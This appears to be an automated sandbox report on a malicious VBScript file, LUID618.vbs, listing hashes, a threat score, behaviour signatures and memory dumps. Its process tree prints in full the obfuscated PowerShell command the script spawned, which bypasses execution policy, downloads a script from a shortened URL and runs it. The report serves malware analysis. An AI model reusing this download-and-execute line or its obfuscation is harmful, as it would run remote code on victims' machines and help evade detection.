Overview

overview

10

Static

static

LUID618.vbs

windows7_x64

8

LUID618.vbs

windows10_x64

10

Analysis

  • max time kernel
    7s
  • max time network
    56s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    25-07-2021 06:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    LUID618.vbs

  • Size

    662B

  • MD5

    a39f9093ecdceb92cf629cd5764dd1d2

  • SHA1

    1942c681159cbbce82dc7388b0de29b984f43bd8

  • SHA256

    83d832887ed1b0af95ca14e647463251f0c9660971fddb03d3959647d6faee4d

  • SHA512

    c18fd694af943cdc74a0679fe43214afb9c652a5e53dca386e631d765449e64bff524809ef2a7923843272dc9040a080028e4f1709eb37b95723b14443521c1a

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LUID618.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec Bypass gdr -*;Set-Variable 5 (&(Get-Item Variable:/E*t).Value.InvokeCommand.(((Get-Item Variable:/E*t).Value.InvokeCommand|Get-Member|?{(DIR Variable:/_).Value.Name-ilike'*ts'}).Name).Invoke('*w-*ct')Net.WebClient);Set-Variable S 'https://bit.ly/3x1bIxK'; (Get-Item Variable:/E*t).Value.InvokeCommand.InvokeScript((GCI Variable:5).Value.((((GCI Variable:5).Value|Get-Member)|?{(DIR Variable:/_).Value.Name-ilike'*wn*g'}).Name).Invoke((GV S -ValueO)))
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1528-60-0x0000000000000000-mapping.dmp
    Download
  • memory/1528-62-0x00000000022D0000-0x00000000022D1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1528-63-0x000000001AD50000-0x000000001AD51000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1528-64-0x000000001A8C0000-0x000000001A8C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1528-65-0x000000001ACD0000-0x000000001ACD2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1528-66-0x000000001ACD4000-0x000000001ACD6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1528-67-0x00000000023B0000-0x00000000023B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1528-68-0x000000001A910000-0x000000001A911000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1528-69-0x000000001B600000-0x000000001B601000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1528-70-0x0000000002320000-0x0000000002321000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1528-71-0x000000001C390000-0x000000001C391000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1980-59-0x000007FEFB761000-0x000007FEFB763000-memory.dmp
    Filesize

    8KB

    Download